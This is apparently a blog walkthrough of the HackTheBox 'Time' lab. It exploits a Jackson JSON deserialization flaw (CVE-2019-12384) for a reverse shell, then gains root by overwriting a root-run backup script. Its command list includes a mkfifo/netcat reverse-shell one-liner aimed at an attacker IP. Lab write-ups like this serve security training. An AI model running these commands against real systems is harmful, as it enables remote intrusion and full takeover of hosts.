Introduction

In this walkthrough, we covered a vulnerability in Jackson library that uses JSON Deserialization and used ‘Time‘ machine from Hackthebox for demo purposes.

CVE Description

FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible.

Source: https://nvd.nist.gov/vuln/detail/CVE-2019-12384

Skills Learned

JSON

Initial Reconnaissance (Recon)

I started by running an nmap scan on the target IP address to see what ports were open. The scan showed two open ports:

  • Port 22 (SSH)
  • Port 80 (HTTP), which had an “Online JSON parser” title.

That “Online JSON parser” title was a big clue, so I decided to focus on the web service on port 80.

Exploiting JSON Deserialization (Getting a User Shell)

When I went to the website, I found an “Online JSON Beautifier & Validator.” I tried a few things and when I entered an invalid JSON string, I got a very specific error message: “Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException…”.

This error told me that the site was using the Jackson library, which is known for JSON deserialization vulnerabilities. A quick Google search led me to a GitHub repository for a Jackson RCE (Remote Code Execution) vulnerability.

The proof-of-concept (PoC) involved using a special URL to execute a script from a remote server. So, I created a file called inject.sql on my own machine with a Java payload that would give me a reverse shell.

I then set up a Python HTTP server on my machine to serve the inject.sql file and a Netcat listener to catch the reverse shell. I pasted the crafted payload into the JSON beautifier on the target machine, and boom! I had a shell as the pericles user.

Privilege Escalation (Getting a Root Shell)

Now that I had a user shell, it was time to get root. I started looking for SUID binaries and writable files and found a suspicious script called timer_backup.sh in /usr/bin/ that was owned by root.

I couldn’t read the script, but I figured it was probably being executed by root and that I, as the pericles user, could write to it. So, I modified the script to execute a reverse shell as root.

I set up another Netcat listener, and after a short wait, the timer_backup.sh script was executed by root, and I had a root shell! I then navigated to the /root directory and grabbed the root.txt flag.

Technical Commands Used

Here are the technical commands I used in the terminal during the demonstration:

  • sudo nmap -sV -Pn 10.10.10.214
  • sudo mkdir Time
  • sudo chown -R motasem:motasem Time
  • sudo nano inject.sql
  • sudo mv inject.sql Time
  • sudo python3 -m http.server
  • nc -lvp 4545
  • sudo nano payload.rb
  • sudo ruby payload.rb
  • id
  • python3 -c 'import pty;pty.spawn("/bin/bash")'
  • whoami
  • cd /
  • ls -la /usr/bin
  • cat /usr/bin/timer_backup.sh
  • echo '#!/bin/bash' > /usr/bin/timer_backup.sh
  • echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 4545 >/tmp/f' >> /usr/bin/timer_backup.sh
  • cat /root/root.txt

Video Walkthrough

, , ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles